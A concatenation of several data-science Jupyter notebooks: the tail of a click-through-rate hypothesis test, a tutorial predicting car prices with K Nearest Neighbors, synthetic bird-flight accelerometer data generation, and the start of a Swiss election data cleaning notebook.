samples = np.random.binomial(n_obs, p, n_trials)

print(np.logical_or(samples <= n_control, samples >= (n_obs - n_control)).mean())
###Output
0.611725
###Markdown
Checking the Evaluation MetricAfter performing our checks on the invariant metric, we can move on to performing a hypothesis test on the evaluation metric: the click-through rate. In this case, we want to see that the experimental group has a significantly larger click-through rate than the control group, a one-tailed test.The simulation approach for this metric isn't too different from the approach for the invariant metric. You'll need the overall click-through rate as the common proportion to draw simulated values from for each group. You may also want to perform more simulations since there's higher variance for this test.There are a few analytic approaches possible here, but you'll probably make use of the normal approximation again in these cases. In addition to the pooled click-through rate, you'll need a pooled standard deviation in order to compute a z-score. While there is a continuity correction possible in this case as well, it's much more conservative than the p-value that a simulation will usually imply. Computing the z-score and resulting p-value without a continuity correction should be closer to the simulation's outcomes, though slightly more optimistic about there being a statistical difference between groups.As with the previous question, you'll find a quiz and video following the workspace for you to check your results.
###Code p_click = data.groupby('condition').mean()['click'] p_click p_click[1] - p_click[0] ###Output _____no_output_____ ###Markdown Analytic Approach ###Code # get number of trials and overall 'success' rate under null n_control = data.groupby('condition').size()[0] n_exper = data.groupby('condition').size()[1] p_null = data['click'].mean() # compute standard error, z-score, and p-value se_p = np.sqrt(p_null * (1-p_null) * (1/n_control + 1/n_exper)) z = (p_click[1] - p_click[0]) / se_p print(z) print(1-stats.norm.cdf(z)) ###Output 1.75718873962 0.0394428219746 ###Markdown Simulation Approach ###Code # get number of trials and overall 'success' rate under null n_control = data.groupby('condition').size()[0] n_exper = data.groupby('condition').size()[1] p_null = data['click'].mean() # simulate outcomes under null, compare to observed outcome n_trials = 200_000 ctrl_clicks = np.random.binomial(n_control, p_null, n_trials) exp_clicks = np.random.binomial(n_exper, p_null, n_trials) samples = exp_clicks / n_exper - ctrl_clicks / n_control print((samples >= (p_click[1] - p_click[0])).mean()) ###Output 0.039785
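###Markdown
As a cross-check, the proptests module imported at the top can run the same one-sided two-proportion z-test in one call. A sketch follows; note that the variance estimate inside proportions_ztest may differ slightly from the hand-rolled pooled version above, so expect a close but not identical p-value:
###Code
clicks = data.groupby('condition')['click'].sum()
visitors = data.groupby('condition').size()

# alternative='larger' tests whether the first proportion (experiment) exceeds the second (control)
z_stat, p_val = proptests.proportions_ztest(count = [clicks[1], clicks[0]],
                                            nobs = [visitors[1], visitors[0]],
                                            alternative = 'larger')
print(z_stat, p_val)
###Output
_____no_output_____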
_notebooks/2021-12-21-Predicting-Car-Prices-K-Nearest-Neighbors.ipynb
###Markdown "Predicting Car Prices using the K Nearest Neighbors Algorithm"> "I use various machine learning workflow techniques to arrive at the optimal K Nearest Neighbors (KNN) regression model for predicting car prices."- author: Migs Germar- toc: true- branch: master- badges: true- comments: true- categories: [python, pandas, numpy, matplotlib, seaborn, scipy, sklearn]- hide: false- search_exclude: false- image: images/notebook-images/knn-car-prices/two-cars.jfif Wheelscene | Chris Smith IntroductionK Nearest Neighbors or KNN is an an algorithm that can make predictions based on the similarity between different observations. In this project, I used KNN to predict the price of a car based on how similar its features are to those of other cars. Towards this end, I applied various machine learning techniques, such as standardization, feature selection, train-test split, hyperparameter optimization, and k-fold cross validation. > Note: I wrote this notebook by following a guided project on the [Dataquest](https://www.dataquest.io/) platform, specifically the [Guided Project: Predicting Car Prices](https://app.dataquest.io/c/36/m/155/guided-project%3A-predicting-car-prices/1/introduction-to-the-data-set). The general project flow and research questions were guided by Dataquest. Furthermore, though the mathematical explanations in this post were written in my own words, I learned the theory from Dataquest. Below are the packages used in this project. ###Code import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns import re from scipy.stats import zscore from sklearn.neighbors import KNeighborsRegressor from sklearn.model_selection import KFold, cross_val_score, train_test_split from sklearn.feature_selection import f_regression, SelectKBest from sklearn.metrics import mean_squared_error ###Output _____no_output_____ ###Markdown Data Inspection and CleaningThe dataset for this project is the Automobile Data Set by Schlimmer (1987), from the UCI Machine Learning Repository. The data and its description can be obtained [here](https://archive.ics.uci.edu/ml/datasets/automobile).The dataset describes 26 features of hundreds of cars. A summary of the features and their data types is shown below. ###Code #collapse-hide # Data dictionary from documentation. data_dict = """1. symboling: -3, -2, -1, 0, 1, 2, 3. 2. normalized-losses: continuous from 65 to 256. 3. make: alfa-romero, audi, bmw, chevrolet, dodge, honda, isuzu, jaguar, mazda, mercedes-benz, mercury, mitsubishi, nissan, peugot, plymouth, porsche, renault, saab, subaru, toyota, volkswagen, volvo 4. fuel-type: diesel, gas. 5. aspiration: std, turbo. 6. num-of-doors: four, two. 7. body-style: hardtop, wagon, sedan, hatchback, convertible. 8. drive-wheels: 4wd, fwd, rwd. 9. engine-location: front, rear. 10. wheel-base: continuous from 86.6 120.9. 11. length: continuous from 141.1 to 208.1. 12. width: continuous from 60.3 to 72.3. 13. height: continuous from 47.8 to 59.8. 14. curb-weight: continuous from 1488 to 4066. 15. engine-type: dohc, dohcv, l, ohc, ohcf, ohcv, rotor. 16. num-of-cylinders: eight, five, four, six, three, twelve, two. 17. engine-size: continuous from 61 to 326. 18. fuel-system: 1bbl, 2bbl, 4bbl, idi, mfi, mpfi, spdi, spfi. 19. bore: continuous from 2.54 to 3.94. 20. stroke: continuous from 2.07 to 4.17. 21. compression-ratio: continuous from 7 to 23. 22. horsepower: continuous from 48 to 288. 23. peak-rpm: continuous from 4150 to 6600. 24. city-mpg: continuous from 13 to 49. 25. 
highway-mpg: continuous from 16 to 54. 26. price: continuous from 5118 to 45400.""" # Use regex to extract column names from data dictionary. col_names = re.findall( pattern = r"^[0-9]{1,2}\. ([a-z\-]+):", string = data_dict, # Use multiline flag so that ^ indicates the start of a line. flags = re.MULTILINE, ) # Read data file and add column names. cars_df = pd.read_csv( "./private/Car-Prices-KNN-Files/imports-85.data", names = col_names, ) cars_df.info() ###Output <class 'pandas.core.frame.DataFrame'> RangeIndex: 205 entries, 0 to 204 Data columns (total 26 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 symboling 205 non-null int64 1 normalized-losses 205 non-null object 2 make 205 non-null object 3 fuel-type 205 non-null object 4 aspiration 205 non-null object 5 num-of-doors 205 non-null object 6 body-style 205 non-null object 7 drive-wheels 205 non-null object 8 engine-location 205 non-null object 9 wheel-base 205 non-null float64 10 length 205 non-null float64 11 width 205 non-null float64 12 height 205 non-null float64 13 curb-weight 205 non-null int64 14 engine-type 205 non-null object 15 num-of-cylinders 205 non-null object 16 engine-size 205 non-null int64 17 fuel-system 205 non-null object 18 bore 205 non-null object 19 stroke 205 non-null object 20 compression-ratio 205 non-null float64 21 horsepower 205 non-null object 22 peak-rpm 205 non-null object 23 city-mpg 205 non-null int64 24 highway-mpg 205 non-null int64 25 price 205 non-null object dtypes: float64(5), int64(5), object(16) memory usage: 41.8+ KB ###Markdown There are 205 cars and 26 features. Most of the features directly describe physical characteristics of the cars. Some exceptions are "symboling" and "normalized-losses", which are values related to car insurance and are beyond the scope of this project. Also, the "price" column provides the price of each car in USD.Let us look at the first five rows. ###Code #collapse-hide cars_df.head() ###Output _____no_output_____ ###Markdown If we compare the data type of each column to its contents, several opportunities for data cleaning can be seen. For example, the "normalized-losses" feature is listed as an object-type column because it contains both strings and numbers. However, the strings in the column are question marks (?). Rather than being categories, these may be placeholders for missing data. This problem applies to several other columns, not just this one.Furthermore, in some columns like "num-of-doors", numbers are written as words. For example, 2 is written as "two". Since the numbers are in string format, these cannot be used in the K Nearest Neighbors model.Thus, in summary, the following cleaning steps have to be performed:- Replace question mark strings ("?") with null values (NaN). These are the proper way to indicate missing values.- Convert several object columns, like "normalized-losses", into numeric columns.- Replace numbers written as words with their proper numeric equivalents. For example, replace "four" with 4.These were performed in the following code cell. ###Code #collapse-hide # Clean the data. # Replace ? with NaN since these are placeholders. cars_df = cars_df.replace("?", np.nan) # Change this object column to float type. obj_to_numeric = [ "normalized-losses", "bore", "stroke", "horsepower", "peak-rpm", "price", ] for col in obj_to_numeric: cars_df[col] = pd.to_numeric(cars_df[col], errors = "coerce") # Replace strings with numeric equivalents. 
cars_df["num-of-doors"] = cars_df["num-of-doors"].replace( { "four": 4.0, "two": 2.0, } ) cars_df["num-of-cylinders"] = cars_df["num-of-cylinders"].replace( { "four": 4, "six": 6, "five": 5, "eight": 8, "two": 2, "three": 3, "twelve": 12, } ) cars_df.info() ###Output <class 'pandas.core.frame.DataFrame'> RangeIndex: 205 entries, 0 to 204 Data columns (total 26 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 symboling 205 non-null int64 1 normalized-losses 164 non-null float64 2 make 205 non-null object 3 fuel-type 205 non-null object 4 aspiration 205 non-null object 5 num-of-doors 203 non-null float64 6 body-style 205 non-null object 7 drive-wheels 205 non-null object 8 engine-location 205 non-null object 9 wheel-base 205 non-null float64 10 length 205 non-null float64 11 width 205 non-null float64 12 height 205 non-null float64 13 curb-weight 205 non-null int64 14 engine-type 205 non-null object 15 num-of-cylinders 205 non-null int64 16 engine-size 205 non-null int64 17 fuel-system 205 non-null object 18 bore 201 non-null float64 19 stroke 201 non-null float64 20 compression-ratio 205 non-null float64 21 horsepower 203 non-null float64 22 peak-rpm 203 non-null float64 23 city-mpg 205 non-null int64 24 highway-mpg 205 non-null int64 25 price 201 non-null float64 dtypes: float64(12), int64(6), object(8) memory usage: 41.8+ KB ###Markdown The new summary of columns is shown above. Several columns which were once "object" columns are now numeric. Also, since we replaced "?" placeholders with null values, we can now see that some columns have missing values. ###Code #collapse-hide null_percs = ( cars_df .isnull() .sum() .divide(cars_df.shape[0]) .multiply(100) ) null_percs.loc[null_percs > 0] ###Output _____no_output_____ ###Markdown The table above shows the percentage of missing values in each column that has them. In particular, "normalized-losses" has missing values in 20% of the observations. Thus, we will have to drop this column from the dataset. This is better than the alternative, which is to delete all rows where "normalized-losses" is missing.As for the other 6 columns, we will use listwise deletion. This means that we will drop all rows with missing values in any of those columns. ###Code #collapse-hide cars_df = ( cars_df .drop("normalized-losses", axis = 1) .dropna( subset = [ "num-of-doors", "bore", "stroke", "horsepower", "peak-rpm", "price", ] ) ) num_null = cars_df.isnull().sum().sum() print(f"Total number of missing values: {num_null}") print(f"New shape of dataset: {cars_df.shape}") ###Output Total number of missing values: 0 New shape of dataset: (193, 25) ###Markdown Now, there are no more missing values in the dataset. There are 193 rows and 25 columns left. The K Nearest Neighbors AlgorithmNext, I will discuss the theory behind the KNN algorithm, then implement it on the dataset.First, let us discuss basic terminology. For your reference, below is a small part of the dataset: ###Code #collapse-hide cars_df.loc[:5, ["make", "fuel-type", "num-of-doors", "body-style", "price"]] ###Output _____no_output_____ ###Markdown Each row of data is called an observation; in this case, each observation is a car.On the other hand, each column is either a feature or a target. The target is the variable that we try to predict, and the features are information used to make the prediction. In the case of this project, the features may include the size of the car, the number of doors, etc. 
The target is the price of the car.The set of cars whose prices we will predict is called the testing set. On the other hand, the training set is the set of cars used to train the model to make predictions. Put more simply, in order to predict the price of a car in the testing set, we must compare it to the cars in the training set.In order to compare cars, KNN uses the Euclidean distance as a similarity metric between two observations. A low distance close to 0 means that the observations are very similar to each other. The following formula is used:$d = \sqrt{\sum_{i=1}^n (q_i - p_i)^2}$- $d$ is the Euclidean distance.- $n$ is the number of features.- $q$ and $p$ each refer to a different observation in the data. In this case, each is a different car. - $q_i$ is the value of feature $i$ for observation $q$. For example, if feature $1$ is the number of doors, $q_1$ is the number of doors on car $q$.- The differences between the two observations' features are squared, then summed up. Finally, the square root of the sum gives the Euclidean distance.Given that we want to predict the price of a car $q$, KNN computes the Euclidean distance of $q$ from *every single car in the training set*. The cars most similar to $q$ are its "nearest neighbors."We then choose a number $k$, which will determine how many of the nearest neighbors will be selected. For example, if $k = 5$, we select the five most similar cars. Then, we take the mean price of these five cars, and we predict that this is the price of car $q$.Since we make a prediction based on an observation's $k$ nearest neighbors, the algorithm is called K Nearest Neighbors. Note that what I have described is an example of a KNN regression model, as it predicts a numeric target. There are still several other forms of KNN. Some use a different similarity metric like Manhattan distance, and some perform classification, which means that they predict a categorical target (Miller, 2019). Techniques for ImplementationUnlike with my previous [post](https://miguelahg.github.io/mahg-data-science/python/pandas/numpy/matplotlib/scikit-learn/2021/12/14/Naive-Bayes-Algorithm-Detecting-Spam-Messages.html) on the Naive Bayes Algorithm, I will not be programming this algorithm manually. Instead, I will use the scikit-learn workflow, which involves pre-packaged machine learning functions.In this part, I will individually discuss certain important techniques used in the machine learning workflow. In the next part, I will combine these techniques in order to obtain the optimal KNN model. StandardizationThe first important technique is standardization. So that each feature will contribute equally to the Euclidean distance, we will standardize each numeric feature. In other words, each value will be converted into a z-score so that the mean of each feature is 0 and its standard deviation is 1. The following equation is used:$z = \frac{x - \bar{x}}{s}$- $z$ is the z-score.- $x$ is a value in a feature.- $\bar{x}$ is the mean of the feature.- $s$ is the sample standard deviation. 
###Code #collapse-hide all_feature_cols = [col for col in cars_df.columns if col != "price"] # Series of feature:data type fdt = cars_df[all_feature_cols].dtypes # Identify numeric features all_numeric_features = fdt.index[fdt != "object"] # Standardize cars_df[all_numeric_features] = cars_df[all_numeric_features].apply(zscore, axis = 0, ddof = 1) cars_df[all_numeric_features].head() ###Output _____no_output_____ ###Markdown The table above shows the first 5 rows of all of the numeric features. Notice that each feature now contains positive and negative values close to 0 because it was standardized. Feature SelectionThe second technique is feature selection. We must choose features which we think are most relevant to a car's price. We can only select numeric features since categorical ones cannot be used to calculate Euclidean distance. Thus, we must select from the following features: ###Code #collapse-hide all_numeric_features.to_list() ###Output _____no_output_____ ###Markdown All of these features are physical characteristics of a car, except for "symboling". According to the dataset documentation by Schlimmer (2019), this feature is an "insurance risk rating." It elaborates:> Cars are initially assigned a risk factor symbol associated with its price. Then, if it is more risky (or less), this symbol is adjusted by moving it up (or down) the scale. Actuarians call this process "symboling". A value of +3 indicates that the auto is risky, -3 that it is probably pretty safe. Given that this feature is systematically associated with the price of a car, it may be relevant to our model. Thus, we will consider it along with the other numeric features.In order to determine which combination of features is the best, we will use univariate feature selection. "Univariate" refers to the use of a single variable. We will perform a statistical test between each feature and the target. Then, we will select the features with the highest scores from the statistical test (scikit-learn developers, 2021).In our case, we have a regression problem, since we want to predict a continuous variable, car price. Thus, we will use the F-statistic as our score function. According to Frost (2017), the F-statistic indicates the "overall significance" of a linear regression model. In univariate feature selection, we would do the following steps:- For each feature: - Perform linear regression where the independent variable is the feature and the dependent variable is the target (in this case, price). - Obtain the F-statistic.- Compile a list with the F-statistic of each feature.- Identify the features with the highest F-statistics.This can be implemented automatically using the scikit-learn's `SelectKBest` class. It is called `SelectKBest` because we can set a parameter `k` which tells how many features to select. For example, if `k = 3`, the top three features with the highest F-statistic are selected. This is done below: ###Code #collapse-hide skb = SelectKBest( score_func = f_regression, k = 3, ) X = cars_df[all_numeric_features] y = cars_df["price"] X_new = skb.fit_transform(X, y) best_features = list(skb.get_feature_names_out()) print("Top 3 features:", best_features) ###Output Top 3 features: ['curb-weight', 'engine-size', 'horsepower'] ###Markdown The results show that curb weight, engine size, and horsepower are the highest-scoring features. However, we will not select these yet for the final model, since other steps still must be discussed. 
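For a fuller picture before moving on, here is a short sketch listing the F-statistic of every candidate feature, read from the fitted selector (SelectKBest stores these in its scores_ attribute after fitting):
###Code
#collapse-hide
f_scores = pd.Series(skb.scores_, index = all_numeric_features)
f_scores.sort_values(ascending = False)
###Output
_____no_output_____
###Markdown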
Train-Test Split with StratificationTrain-test split is the third important technique.Before model training, the dataset has to be split into training and testing sets. We will use 80% of the data in the training set and 20% in the testing set. As the names suggest, the training set is used to train the model or help it *learn* how to predict car prices. Then, we make predictions on the cars on the testing set to see whether the predictions are accurate.Before we split the data, though, we have to ensure that the frequency distribution of the target is similar between the training and testing sets. Below is a histogram of the frequency distribution of car price across the entire dataset: ###Code #collapse-hide sns.histplot(cars_df["price"], bins = 100) plt.title("Frequency Distribution of Car Price") plt.xlabel("Price (USD)") plt.ylabel("Number of Cars") plt.show() ###Output _____no_output_____ ###Markdown The graph shows a right-skewed distribution, which means that most of the car prices are low and there are outliers with high prices. When we split the data into training and testing sets, we want each set to have a similar distribution to this.De Cock (2011) provides a helpful suggestion on how to do this. The article says, "Simply order the original data set by a variable of interest (such as sale price) and select every kth observation to achieve the desired sample size (k=2 for a 50/50 split or k=4 for a 75/25 split)."In our case, we want an 80/20 split. One-fifth of the data will go to the testing set, so we can use k = 5. We will thus order the observations by price, then assign every 5th observation to the testing set. All other observations will go to the training set.In the code below, I have written a custom function `stratify_continuous` that uses this technique. I then performed a train-test split after stratification. `X_train` and `y_train` refer to the features and target in the training set, respectively. `X_test` and `y_test` are from the testing set. ###Code #collapse-hide def stratify_continuous(n_folds, y): """Stratify a dataset on a continuous target.""" if n_folds < 2 or n_folds > 10: raise ValueError("Please select a number of folds from 2 to 10.") fold_nums = list(range(n_folds)) # DataFrame where "index" column contains the original indices df = pd.DataFrame( y # Shuffle before ranking so that cars with the same price are ordered randomly. .sample(frac = 1, random_state = 1, ignore_index = False) ) # This column gives a rank to each value in y. 0 is the rank of the lowest value. # Ties are broken according to order of appearance. 
df["rank"] = df[y.name].rank(method = "first") - 1 df["fold"] = 0 for f in fold_nums[1:]: # start at f, then increment by n_folds indices = list(range(f, df.shape[0], n_folds)) df.loc[df["rank"].isin(indices), "fold"] = f # Revert df to original order of indices df = df.reindex(index = y.index) # A series that indicates the fold number of each observation according to its original position in y fold_series = df["fold"].copy() return fold_series folds = stratify_continuous( n_folds = 5, y = cars_df["price"], ) def split_folds(X, y, fold_series, test_fold): """Take a dataset whose observations have been grouped into folds, then perform a train-test split.""" if fold_series.dtype != "int64": raise AttributeError("The fold list does not purely contain integers.") test_mask = (fold_series == test_fold) X_train = X.loc[~test_mask].copy() y_train = y.loc[~test_mask].copy() X_test = X.loc[test_mask].copy() y_test = y.loc[test_mask].copy() return X_train, X_test, y_train, y_test X_train, X_test, y_train, y_test = split_folds( X = cars_df[all_numeric_features], y = cars_df["price"], fold_series = folds, test_fold = 4, ) # Summary statistics for target columns. target_df = pd.concat( [y_train, y_test], axis = 1, join = "outer", ) target_df.columns = ["y_train price", "y_test price"] target_df.describe() ###Output _____no_output_____ ###Markdown This table shows summary statistics for the price columns of the two sets. The sets have similar means at around USD 13,200, and they also have similar medians at around USD 10,200.Let us compare the price distributions using KDE plots: ###Code #collapse-hide sns.kdeplot(y_train, label = "Training set") sns.kdeplot(y_test, label = "Testing set") plt.title("Comparison of Car Prices Between Sets") plt.xlabel("Price (USD)") plt.ylabel("Probability Density") plt.legend() plt.show() ###Output _____no_output_____ ###Markdown The KDE plots both seem to follow the same shape and have the same center. This shows that the training and testing sets have roughly the same distribution of car prices. Thus, these were stratified correctly. Hyperparameter OptimizationThe fourth technique is hyperparameter optimization. This involves training the KNN model using different hyperparameter values to see which one performs the best.A hyperparameter is a value that influences the behavior of a model and has no relation to the data. In the case of KNN, one important hyperparameter is the $k$ value, or the number of neighbors used to make a prediction. If $k = 5$, we take the mean price of the top five most similar cars and call this our prediction. However, if $k = 10$, we take the top ten cars, so the mean price may be different.We can optimize $k$ in this way:- Decide values of $k$ to test.- For each $k$ value, fit and evaluate a KNN model.- Identify the best-performing model and use its $k$ value in the final model.In order to evaluate a model, we need an evaluation metric. In our case, we will use the Root Mean Squared Error or RMSE. This is calculated with the following equation:$RMSE = \sqrt{\frac{1}{n} \sum_{i=1}^n (\text{actual}_i - \text{predicted}_i)^2}$- $n$ is the sample size.- $\text{actual}$ is the actual target value, or in this case, the actual price of a car.- $\text{predicted}$ is the predicted target value.RMSE can be interpreted as the average error of a regression model. 
For example, if $RMSE = 1000$, this means that the model's predicted car prices are USD 1000 away from the actual car prices, on average.Below is an example of hyperparameter optimization using RMSE. All of the numeric features were used for this example. ###Code #collapse-hide k_values = [1, 3, 5] k_rmse = pd.Series(dtype = "float64") for k in k_values: knn = KNeighborsRegressor( n_neighbors = k, algorithm = "auto", ) knn.fit(X_train, y_train) y_pred = knn.predict(X_test) rmse = np.sqrt(mean_squared_error(y_test, y_pred)) k_rmse.loc[k] = rmse print("k value and RMSE") k_rmse ###Output k value and RMSE ###Markdown The table above shows that RMSE was lowest for $k = 3$. The RMSE was about USD 3146, which means that on average, the predicted prices are USD 3146 away from the actual prices. K-Fold Cross-Validation The last technique that will be discussed is K-Fold Cross-Validation. Earlier, we split the data into one training set and one testing set. The K-Fold Cross-Validation allows us to obtain a more holistic view of model performance by rotating the observations used in the two sets. In the words of Brownlee (2018), it estimates "how the model is expected to perform in general when used to make predictions on data not used during the training of the model."Here, $k$ has a different meaning. It determines the number of splits to make in a dataset. For example, if $k = 5$, the dataset will be split into 5 folds, each set containing 20% of the total data.In summary, the following steps are performed:- Split the data into 5 folds: A, B, C, D, E.- Use fold A as the testing set and use the others as the training set.- Fit and evaluate a KNN model, thus obtaining RMSE.- Repeat the above process for a total of 5 times, so that each fold is used as a testing set once.- Compile a list of the five RMSE values obtained.- Compute the mean RMSE value. This is the final metric of model performance.K-Fold Cross-Validation can be implemented using scikit-learn's `KFold` and `cross_val_score` . An example of 5-fold cross-validation is shown below. ###Code #collapse-hide knn = KNeighborsRegressor( n_neighbors = 5, algorithm = "auto", ) kf = KFold(5, shuffle = True, random_state = 1) mses = cross_val_score( estimator = knn, X = cars_df[all_numeric_features], y = cars_df["price"], scoring = "neg_mean_squared_error", cv = kf, ) mses = pd.Series(mses) rmses = mses.abs().pow(1/2) mean_rmse = rmses.mean() sd_rmse = rmses.std(ddof = 1) print(f"""Regular 5-fold cross-validation Mean RMSE: {mean_rmse:.2f} Standard Deviation RMSE: {sd_rmse:.2f} RMSE Values: {rmses.to_list()}""") ###Output Regular 5-fold cross-validation Mean RMSE: 3722.28 Standard Deviation RMSE: 565.62 RMSE Values: [3407.8275635020186, 3902.1144860913682, 3009.7340988268425, 4521.314079941105, 3770.3892479494248] ###Markdown The mean RMSE above presents a better picture of the model's performance because it takes into account different possible combinations of training and testing sets.Note, however, that the standard deviation of the RMSE was around 566. This means that the RMSE values varied by several hundreds of dollars from model to model during the cross-validation. In simpler terms, the model performance was inconsistent. It performed much better when trained on some folds than when it was trained on other folds.Thus, we can take k-fold cross-validation a step further by stratifying the folds so that they will have similar price distributions. This will ensure that each fold is representative of the full sample. 
Thus, I have written a custom function in the code cell below to do this. ###Code #collapse-hide def stratified_kfcv(X, y, fold_series, regression_model): """Conduct k-fold cross-validation on a stratified dataset.""" fold_nums = fold_series.unique() mse_lst = [] for f in fold_nums: X_train, X_test, y_train, y_test = split_folds( X = X, y = y, test_fold = f, fold_series = fold_series, ) regression_model.fit(X_train, y_train) y_pred = regression_model.predict(X_test) mse = mean_squared_error(y_test, y_pred) mse_lst.append(mse) return mse_lst knn = KNeighborsRegressor( n_neighbors = 5, algorithm = "auto", ) mse_lst = stratified_kfcv( X = cars_df[all_numeric_features], y = cars_df["price"], fold_series = folds, regression_model = knn, ) mse_series = pd.Series(mse_lst) rmse_series = mse_series.pow(1/2) mean_rmse = rmse_series.mean() sd_rmse = rmse_series.std(ddof = 1) print(f"""Stratified 5-fold cross-validation Mean RMSE: {mean_rmse:.2f} Standard Deviation RMSE: {sd_rmse:.2f} RMSE Values: {rmse_series.to_list()}""") ###Output Stratified 5-fold cross-validation Mean RMSE: 3369.44 Standard Deviation RMSE: 387.33 RMSE Values: [3193.0727214096655, 2883.515369146238, 3844.6421242541865, 3674.5947449327227, 3251.39247707809] ###Markdown The mean RMSE from stratified CV was USD 3369. This is about USD 400 lower than the result of the regular CV, USD 3722.Furthermore, the SD RMSE is equal to 387, which is lower than the previous value of 566. Therefore, the five models trained during cross-validation performed more similarly to each other.Thus, we can see that stratifying observations before k-fold cross-validation can be more effective at approximating the true performance of the model compared to regular k-fold cross-validation. Combining TechniquesIn this part, we will combine all of the discussed techniques to optimize the KNN model.The steps are as follows:- Use the standardized features that were calculated earlier.- For each number `n_features` from 1 to 10: - Perform univariate feature selection using the F-statistic. - Identify the best `n_features` features. - For each number `k` from 1 to 20: - Evaluate the model using stratified 5-fold cross-validation. - For each fold, train a `k` nearest neighbors model using the best features. - Obtain the mean RMSE value.- Compile a list of all mean RMSE values obtained.- Identify the model with the lowest mean RMSE. This is the final model.This is implemented in the code below. 
###Code #collapse-hide n_feature_list = list(range(1, 11)) result_lst = [] for n_features in n_feature_list: # Univariate feature selection skb = SelectKBest( score_func = f_regression, k = n_features, ) X = cars_df[all_numeric_features] y = cars_df["price"] X_new = skb.fit_transform(X, y) # List of "best" features best_features = list(skb.get_feature_names_out()) k_values = list(range(1, 21)) for k in k_values: # stratified 5-fold cross validation knn = KNeighborsRegressor( # Use a different k value each time n_neighbors = k, algorithm = "auto", ) mse_lst = stratified_kfcv( X = cars_df[best_features], y = cars_df["price"], fold_series = folds, regression_model = knn, ) mse_series = pd.Series(mse_lst) rmse_series = mse_series.pow(1/2) mean_rmse = rmse_series.mean() sd_rmse = rmse_series.std(ddof = 1) new_row = (n_features, best_features, k, mean_rmse, sd_rmse) result_lst.append(new_row) result_df = pd.DataFrame(result_lst) result_df.columns = ["Number of Features", "Best Features", "k Neighbors", "Mean RMSE", "SD RMSE"] result_df = ( result_df .sort_values(["Mean RMSE", "SD RMSE"], ascending = True) .reset_index(drop = True) ) ###Output _____no_output_____ ###Markdown Before we discuss the top-performing models, let us look at the general trends in the results using some graphs. ###Code #collapse-hide sns.lineplot( data = result_df, x = "k Neighbors", y = "Mean RMSE", hue = "Number of Features", ) plt.title("Mean RMSE against k Neighbors") plt.show() ###Output _____no_output_____ ###Markdown The graph above shows that in general, no matter the number of features, the mean RMSE increased as the number of neighbors (k) increased. Therefore, it is best to have a low k value so that the model makes predictions only using a few cars that are most similar to the car being tested.Next, let us look at a graph with the same variables, except that the number of features is now on the x-axis instead of k. ###Code #collapse-hide sns.lineplot( data = result_df, x = "Number of Features", y = "Mean RMSE", hue = "k Neighbors", ) plt.title("Mean RMSE against Number of Features") plt.show() ###Output _____no_output_____ ###Markdown We can see that for models with a high k value (represented by the darker lines), the mean RMSE increased slightly as the number of features increased.However, for models with a low k value (represented by the lighter pink lines), the mean RMSE stayed the same or even decreased when the number of features increased.Therefore, the best model would be one with a low k value and a medium-to-high number of features.In order to determine this more precisely, let us look at the top 10 models with the lowest RMSE. ###Code #collapse-hide result_df.head(10) ###Output _____no_output_____
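###Markdown
To close the loop, here is a sketch that refits the single best configuration and reports its RMSE on one held-out fold. This assumes the first row of result_df holds the winning combination, and the choice of test fold 0 is arbitrary:
###Code
#collapse-hide
best = result_df.iloc[0]

knn_final = KNeighborsRegressor(n_neighbors = best["k Neighbors"])

X_train, X_test, y_train, y_test = split_folds(
    X = cars_df[best["Best Features"]],
    y = cars_df["price"],
    fold_series = folds,
    test_fold = 0,
)

knn_final.fit(X_train, y_train)
rmse_final = np.sqrt(mean_squared_error(y_test, knn_final.predict(X_test)))
print(f"Final model RMSE on the held-out fold: {rmse_final:.2f}")
###Output
_____no_output_____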
bird_flapping.ipynb
###Markdown
As a researcher of bird behavior I am tracking birds with accelerometers using the https://uva-bits.nl system. To study the birds' energy usage I want to create a machine learning model. To train this model I need some artificial data. Real data setThe file https://github.com/NLeSC/eEcology-Annotation-UI/raw/master/demo/tracker.json was derived from the uva-bits database for tracker 355 on 2010-06-28.
###Code
import json
import urllib.request
import pandas as pd

with urllib.request.urlopen('https://github.com/NLeSC/eEcology-Annotation-UI/raw/master/demo/tracker.json') as f:
    data = json.load(f)

frame = 34
df = pd.DataFrame({
    'x': data[frame]['x_acceleration'],
    'y': data[frame]['y_acceleration'],
    'z': data[frame]['z_acceleration']},
    index=data[frame]['time_acceleration']
)
df.info()
df.plot()
###Output
<class 'pandas.core.frame.DataFrame'>
Float64Index: 40 entries, 0.0 to 1.95
Data columns (total 3 columns):
 #   Column  Non-Null Count  Dtype  
---  ------  --------------  -----  
 0   x       40 non-null     float64
 1   y       40 non-null     float64
 2   z       40 non-null     float64
dtypes: float64(3)
memory usage: 1.2 KB
###Markdown
Let us recreate this with sequgen
###Code
import numpy as np
from sequgen.deterministic.sine import sine
from sequgen.deterministic.constant import constant

t_predict = np.linspace(0, 2, 40) # 2 seconds sampled at 20 Hz

x = sine(t_predict, wavelength=2/6, amplitude=0.25, phase_shift=0.25) + \
    sine(t_predict, wavelength=2/6, amplitude=0.1, phase_shift=0.1) + \
    constant(t_predict, -0.2)
z = sine(t_predict, wavelength=2/6, # 6 flaps in 2 seconds
         amplitude=1, phase_shift=0.05) + constant(t_predict, 1) # add Earth's gravity (1 g)
y = sine(t_predict, wavelength=2/6, amplitude=0.25, phase_shift=0.05) + \
    sine(t_predict, wavelength=2/6, amplitude=0.1, phase_shift=0.2)
pd.DataFrame({'x':x, 'y':y, 'z': z}, index=t_predict).plot()
###Output
_____no_output_____
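###Markdown
Real tracker measurements are never this clean, so as a rough sketch we can add Gaussian measurement noise with NumPy. The noise level of 0.05 g here is an assumption for illustration, not a tracker specification:
###Code
rng = np.random.default_rng(42)
noise_sd = 0.05  # assumed measurement noise level in g

# add independent noise to each axis of the synthetic signal
x_noisy = x + rng.normal(0, noise_sd, size=x.shape)
y_noisy = y + rng.normal(0, noise_sd, size=y.shape)
z_noisy = z + rng.normal(0, noise_sd, size=z.shape)
pd.DataFrame({'x': x_noisy, 'y': y_noisy, 'z': z_noisy}, index=t_predict).plot()
###Output
_____no_output_____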
09 Pandas Teil 2/dataprojects/wahlen/Clean.ipynb
###Markdown
Cleaning the data This is how we get from the BFS cube to a clean data file **Source:**- Election results from the BFS: The data is available from the BFS: https://www.pxweb.bfs.admin.ch/pxweb/de/px-x-1702020000_105/px-x-1702020000_105/px-x-1702020000_105.px Preparation As an exception, we import a few more libraries than usual...
###Code
import pandas as pd
import numpy as np
###Output
_____no_output_____
###Markdown
